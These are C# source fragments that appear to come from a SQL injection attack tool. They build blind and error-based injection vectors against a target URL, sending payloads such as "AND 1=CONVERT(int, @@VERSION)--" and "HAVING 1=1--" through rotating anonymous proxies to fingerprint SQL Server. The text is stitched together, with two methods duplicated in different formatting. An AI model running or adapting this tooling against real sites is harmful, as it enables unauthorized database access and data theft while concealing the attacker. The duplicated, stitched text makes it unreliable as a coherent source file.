/// <summary>
/// Converts the Attack Vector from the native type to XML
/// </summary>
/// <param name="xInput">The XML node to start deserialization</param>
/// <param name="AnonProxies">Any anonymous proxies being used</param>
public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
{
string FullUrl;
if (!_UseSSL)
{
FullUrl = "http://" + _TargetURL;
}
else
{
FullUrl = "https://" + _TargetURL;
}
XmlNode n = xInput.SelectSingleNode("attackvector");
if (n == null)
{
return;
}
InjectionOptions opts;
if (_IsBlind)
{
opts = new BlindInjectionOptions();
((BlindInjectionOptions)opts).Delimiter = _FilterDelimiter;
((BlindInjectionOptions)opts).Tolerance = _Tolerance;
((BlindInjectionOptions)opts).Throttle = _ThrottleValue;
}
else
{
opts = new ErrorInjectionOptions();
}
opts.TerminateQuery = _TerminateQuery;
opts.WebProxies = AnonProxies;
AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
_TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));
_TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}
private void InitializeAttackVectors()
{
string URL;
URL = ctlConnection1.UseSsl == true ? "https://" : "http://";
URL += ctlConnection1.TargetUrl;
string Method = ctlConnection1.ConnectMethod;
if (Method.Equals("")) return;
SafelyChangeCursor(Cursors.WaitCursor);
// Generate StringDict
string TargetName, TargetField;
bool InjectAsString;
TargetName = String.Empty; TargetField = String.Empty;
NameValueCollection Others = new NameValueCollection();
NameValueCollection Cookies = new NameValueCollection();
Others = FormParameters.FormParameters(ref TargetName, ref TargetField, out InjectAsString);
Cookies = FormParameters.Cookies;
if (TargetName.Equals(String.Empty))
{
UserStatus("No Injection Point Found");
SafelyChangeCursor(Cursors.Default);
return;
}
UserStatus("Beginning Preliminary Scan");
try
{
SafelyChangeEnableOfControl(butInitializeInjection, false);
AttackVectorFactory avf;
InjectionOptions opts;
if (optBlindInjection.Checked == true)
{
opts = new BlindInjectionOptions();
((BlindInjectionOptions)opts).Tolerance = _AbsintheState.FilterTolerance;
((BlindInjectionOptions)opts).Delimiter = _AbsintheState.FilterDelimiter;
}
else
{
opts = new ErrorInjectionOptions();
((ErrorInjectionOptions)opts).VerifyVersion = chkVerifyVersion.Checked;
}
opts.TerminateQuery = _AbsintheState.TerminateQuery;
opts.Cookies = Cookies;
opts.WebProxies = _AppSettings.ProxyQueue();
opts.InjectAsString = InjectAsString;
opts.UserAgent = _AbsintheState.UserAgent;
opts.AuthCredentials = ctlUserAuth1.NetworkCredential;
opts.AppendedQuery = _AbsintheState.AppendedText;
avf = new AttackVectorFactory(URL, TargetName, TargetField, Others, Method, opts);
avf.UserStatus += new UserEvents.UserStatusEventHandler(UserStatus);
int PluginNumber = Array.IndexOf(_PluginEntries, _AbsintheState.LoadedPluginName);
IPlugin pt = null;
if (optBlindInjection.Checked)
{
foreach (IPlugin bp in _AbsintheState.PluginList)
{
if (bp.GetType().GetInterface("IBlindPlugin") != null)
{
if (bp.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
{
pt = (IPlugin)bp;
break;
}
}
}
_AbsintheState.TargetAttackVector = avf.BuildBlindSqlAttackVector(_AbsintheState.FilterTolerance, (IBlindPlugin)pt);
UserStatus("Finished initial scan");
}
else if (optErrorBasedInjection.Checked)
{
if (PluginNumber <= 0)
{
pt = AutoDetectPlugin(avf);
}
else
{
foreach (IPlugin ep in _AbsintheState.PluginList)
{
if (ep.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
{
pt = (IPlugin)ep;
break;
}
}
}
if (pt != null)
{
try
{
_AbsintheState.TargetAttackVector = avf.BuildSqlErrorAttackVector((IErrorPlugin)pt);
UserStatus("Finished initial scan");
}
catch (UnsupportedSQLErrorVersionException sqlex)
{
ErrorReportingDelegate ts = new ErrorReportingDelegate(ThreadUnsafeDisplayErrorReportDialog);
this.Invoke(ts, new object[] { sqlex.VersionErrorPageHtml, sqlex.HavingErrorPageHtml });
}
}
}
}
catch (Exception e)
{
System.Diagnostics.Debug.WriteLine(e.ToString());
UserStatus(e.Message);
}
finally
{
SafelyChangeEnableOfControl(butInitializeInjection, true);
SafelyChangeCursor(Cursors.Default);
}
}
private IErrorPlugin AutoDetectPlugin(AttackVectorFactory avf)
{
List<IErrorPlugin> PluginList = new List<IErrorPlugin>();
foreach (IPlugin ep in _AbsintheState.PluginList)
{
if (ep.GetType().GetInterface("IErrorPlugin") != null)
PluginList.Add((IErrorPlugin) ep);
}
IErrorPlugin[] pl = SqlErrorAttackVector.AutoDetectPlugins(PluginList.ToArray(), avf, (_AppSettings.ProxyInUse) ? _AppSettings.RotatedProxy() : null);
if (pl.Length == 1)
{
ChangeSelectedPluginText(pl[0].PluginDisplayTargetName);
return pl[0];
}
else if (pl.Length == 0)
{
ChangeSelectedPluginText(PluginList[0].PluginDisplayTargetName);
return PluginList[0];
}
else
{
System.Text.StringBuilder sb = new System.Text.StringBuilder();
sb.Append("Multiple plugins support this version of SQL Server. Please select one of the following:");
foreach (IErrorPlugin epl in pl)
{
sb.Append(Environment.NewLine).Append(epl.PluginDisplayTargetName);
}
UserMessage(sb.ToString());
// handle this
return null;
}
}
/// <summary>
/// Automatically uses the available plugins to find a possible match.
/// </summary>
/// <param name="PossiblePlugins">The collection of possible error plugins</param>
/// <param name="avf">The attack vector factory that will be used to generate the tests</param>
/// <param name="Wp">The web proxy to use for the tests</param>
/// <returns></returns>
public static IErrorPlugin[] AutoDetectPlugins(IErrorPlugin[] PossiblePlugins, AttackVectorFactory avf,
WebProxy Wp)
{
StringBuilder CurrentVector = new StringBuilder();
CurrentVector.Append(avf.VectorBuffer);
if (avf.Options.InjectAsString)
{
CurrentVector.Append("'");
}
CurrentVector.Append(" AND 1=CONVERT(int, @@VERSION)");
if (avf.Options.TerminateQuery)
{
CurrentVector.Append("--");
}
else if (avf.Options.InjectAsString)
{
CurrentVector.Append(" AND '1'='1");
}
avf.AttackParams[avf.VectorName] = CurrentVector.ToString();
string ResultPage;
ResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost, avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);
bool FoundVersion = false;
List <IErrorPlugin> FoundValues = new List <IErrorPlugin>();
foreach (IErrorPlugin Plugin in PossiblePlugins)
{
foreach (string VersionString in Plugin.KnownSupportedVersions)
{
if (ResultPage.IndexOf(VersionString) >= 0)
{
FoundVersion = true;
FoundValues.Add(Plugin);
break;
}
}
}
if (!FoundVersion)
{
CurrentVector = new StringBuilder();
CurrentVector.Append(avf.VectorBuffer);
if (avf.Options.InjectAsString)
{
CurrentVector.Append("'");
}
CurrentVector.Append(" HAVING ");
if (avf.Options.InjectAsString && !avf.Options.TerminateQuery)
{
CurrentVector.Append("'1'='1");
}
else
{
CurrentVector.Append("1=1");
}
if (avf.Options.TerminateQuery)
{
CurrentVector.Append("--");
}
avf.AttackParams[avf.VectorName] = CurrentVector.ToString();
string HavingResultPage;
HavingResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost, avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);
throw new UnsupportedSQLErrorVersionException(ResultPage, HavingResultPage);
}
return(FoundValues.ToArray());
}
/// <summary>
/// Automatically uses the available plugins to find a possible match.
/// </summary>
/// <param name="PossiblePlugins">The collection of possible error plugins</param>
/// <param name="avf">The attack vector factory that will be used to generate the tests</param>
/// <param name="Wp">The web proxy to use for the tests</param>
/// <returns></returns>
public static IErrorPlugin[] AutoDetectPlugins(IErrorPlugin[] PossiblePlugins, AttackVectorFactory avf,
WebProxy Wp)
{
StringBuilder CurrentVector = new StringBuilder();
CurrentVector.Append(avf.VectorBuffer);
if (avf.Options.InjectAsString)
CurrentVector.Append("'");
CurrentVector.Append(" AND 1=CONVERT(int, @@VERSION)");
if (avf.Options.TerminateQuery)
CurrentVector.Append("--");
else if (avf.Options.InjectAsString)
CurrentVector.Append(" AND '1'='1");
avf.AttackParams[avf.VectorName] = CurrentVector.ToString();
string ResultPage;
ResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost, avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);
bool FoundVersion = false;
List<IErrorPlugin> FoundValues = new List<IErrorPlugin>();
foreach (IErrorPlugin Plugin in PossiblePlugins)
{
foreach (string VersionString in Plugin.KnownSupportedVersions)
{
if(ResultPage.IndexOf(VersionString) >= 0)
{
FoundVersion = true;
FoundValues.Add(Plugin);
break;
}
}
}
if (!FoundVersion)
{
CurrentVector = new StringBuilder();
CurrentVector.Append(avf.VectorBuffer);
if (avf.Options.InjectAsString)
CurrentVector.Append("'");
CurrentVector.Append(" HAVING ");
if (avf.Options.InjectAsString && !avf.Options.TerminateQuery)
CurrentVector.Append("'1'='1");
else
CurrentVector.Append("1=1");
if (avf.Options.TerminateQuery)
CurrentVector.Append("--");
avf.AttackParams[avf.VectorName] = CurrentVector.ToString();
string HavingResultPage;
HavingResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost, avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);
throw new UnsupportedSQLErrorVersionException(ResultPage, HavingResultPage);
}
return FoundValues.ToArray();
}
/// <summary>
/// Converts the Attack Vector from the native type to XML
/// </summary>
/// <param name="xInput">The XML node to start deserialization</param>
/// <param name="AnonProxies">Any anonymous proxies being used</param>
public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
{
string FullUrl;
if (!_UseSSL) FullUrl = "http://" + _TargetURL;
else FullUrl = "https://" + _TargetURL;
XmlNode n = xInput.SelectSingleNode("attackvector");
if (n == null) return;
InjectionOptions opts;
if (_IsBlind)
{
opts = new BlindInjectionOptions();
((BlindInjectionOptions) opts).Delimiter = _FilterDelimiter;
((BlindInjectionOptions) opts).Tolerance = _Tolerance;
((BlindInjectionOptions) opts).Throttle = _ThrottleValue;
}
else
opts = new ErrorInjectionOptions();
opts.TerminateQuery = _TerminateQuery;
opts.WebProxies = AnonProxies;
AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
_TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));
_TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}
